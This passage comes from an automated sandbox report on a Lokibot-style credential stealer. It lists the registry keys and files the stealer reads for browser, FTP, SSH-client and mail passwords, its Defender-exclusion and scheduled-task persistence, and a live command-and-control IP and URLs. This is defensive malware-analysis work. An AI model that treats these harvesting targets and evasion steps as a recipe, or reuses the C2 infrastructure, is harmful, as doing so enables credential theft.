              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeQueries volume information: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: YvVDV4cbjy.exe PID: 6584, type: MEMORYSTR
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: PopPassword15_2_0040D069
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: SmtpPassword15_2_0040D069
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              111
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              111
              Security Software Discovery
              Remote Services1
              Email Collection
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              Scheduled Task/Job
              11
              Disable or Modify Tools
              2
              Credentials in Registry
              1
              Process Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares2
              Data from Local System
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture112
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1588964 Sample: YvVDV4cbjy.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 10 other signatures 2->55 7 YvVDV4cbjy.exe 7 2->7         started        11 HxQXdrrQ.exe 5 2->11         started        process3 file4 39 C:\Users\user\AppData\Roaming\HxQXdrrQ.exe, PE32 7->39 dropped 41 C:\Users\...\HxQXdrrQ.exe:Zone.Identifier, ASCII 7->41 dropped 43 C:\Users\user\AppData\Local\...\tmp1DE9.tmp, XML 7->43 dropped 45 C:\Users\user\AppData\...\YvVDV4cbjy.exe.log, ASCII 7->45 dropped 57 Uses schtasks.exe or at.exe to add and modify task schedules 7->57 59 Adds a directory exclusion to Windows Defender 7->59 61 Injects a PE file into a foreign processes 7->61 13 YvVDV4cbjy.exe 184 7->13         started        17 powershell.exe 23 7->17         started        19 powershell.exe 23 7->19         started        21 schtasks.exe 1 7->21         started        63 Multi AV Scanner detection for dropped file 11->63 65 Tries to steal Mail credentials (via file registry) 11->65 67 Machine Learning detection for dropped file 11->67 23 schtasks.exe 11->23         started        25 HxQXdrrQ.exe 11->25         started        27 HxQXdrrQ.exe 11->27         started        signatures5 process6 dnsIp7 47 94.156.177.41, 49707, 49708, 49709 NET1-ASBG Bulgaria 13->47 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->69 71 Tries to steal Mail credentials (via file / registry access) 13->71 73 Tries to harvest and steal ftp login credentials 13->73 75 Tries to harvest and steal browser information (history, passwords, etc) 13->75 77 Loading BitLocker PowerShell Module 17->77 29 conhost.exe 17->29         started        31 WmiPrvSE.exe 17->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        signatures8 process9

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              YvVDV4cbjy.exe75%VirustotalBrowse
              YvVDV4cbjy.exe79%ReversingLabsByteCode-MSIL.Backdoor.FormBook
              YvVDV4cbjy.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\HxQXdrrQ.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\HxQXdrrQ.exe79%ReversingLabsByteCode-MSIL.Backdoor.FormBook
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://94.156.177.41/simple/five/fre.php100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://kbfvzoboss.bid/alien/fre.phpfalse
                high
                http://alphastand.win/alien/fre.phpfalse
                  high
                  http://alphastand.trade/alien/fre.phpfalse
                    high
                    http://alphastand.top/alien/fre.phpfalse
                      high
                      http://94.156.177.41/simple/five/fre.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameYvVDV4cbjy.exe, 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, HxQXdrrQ.exe, 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://localhost/calculator_server/requests.phpYvVDV4cbjy.exe, HxQXdrrQ.exe.0.drfalse
                          high
                          http://www.ibsensoftware.com/HxQXdrrQ.exe, HxQXdrrQ.exe, 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            94.156.177.41
                            unknownBulgaria
                            43561NET1-ASBGtrue
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1588964
                            Start date and time:2025-01-11 07:43:32 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 53s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:18
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:YvVDV4cbjy.exe
                            renamed because original name is a hash value
                            Original Sample Name:ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@21/17@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 70
                            • Number of non-executed functions: 15
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.175.87.197, 13.107.246.45
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            01:44:21API Interceptor130x Sleep call for process: YvVDV4cbjy.exe modified
                            01:44:23API Interceptor31x Sleep call for process: powershell.exe modified
                            01:44:26API Interceptor1x Sleep call for process: HxQXdrrQ.exe modified
                            07:44:23Task SchedulerRun new task: HxQXdrrQ path: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            94.156.177.41EozUxz4ybi.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            oAUBqI6vQ7.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            Quotation2025-0107pdf.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                            • 94.156.177.41/mars/five/fre.php
                            ZsRFRjkt9q.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/alpha/five/fre.php
                            0yWVteGq5T.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            CLOSURE DATE FOR THE YEAR.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/kings/five/fre.php
                            Order84746.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/davinci/five/fre.php
                            FVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                            • 94.156.177.41/soja/five/fre.php
                            Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                            • 94.156.177.41/simple/five/fre.php
                            file.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            NET1-ASBGEozUxz4ybi.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41
                            oAUBqI6vQ7.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41
                            IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 94.156.177.164
                            QUOTATION-9044456778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                            • 94.156.177.117
                            Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                            • 95.87.199.40
                            Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                            • 93.123.77.220
                            Kloki.arm7.elfGet hashmaliciousUnknownBrowse
                            • 83.222.191.90
                            Kloki.m68k.elfGet hashmaliciousUnknownBrowse
                            • 83.222.191.90
                            Kloki.x86_64.elfGet hashmaliciousUnknownBrowse
                            • 83.222.189.67
                            Kloki.x86.elfGet hashmaliciousUnknownBrowse
                            • 83.222.190.214
                            No context
                            No context
                            Process:C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:true
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2232
                            Entropy (8bit):5.379552885213346
                            Encrypted:false
                            SSDEEP:48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0UyuVws:fLHxvCsIfA2KRHmOugr1Vws
                            MD5:A8E0D497947F820B1578A90D417338D4
                            SHA1:945FF7C68A85BA98DD6077BF821D70C5D553C605
                            SHA-256:4626E2474B02F78DBD152878E50A4789514B4975D10D2C6D2FF557C7BCBAA166
                            SHA-512:971F39BC7970CA54CF45CB7065ADEA48559404E838BFAC09B4A4CEAD255A08B5D329C8F607CC0BA92B9C5761977BA904BC61A46B77FC40FB19BE582A6EDE3D91
                            Malicious:false
                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
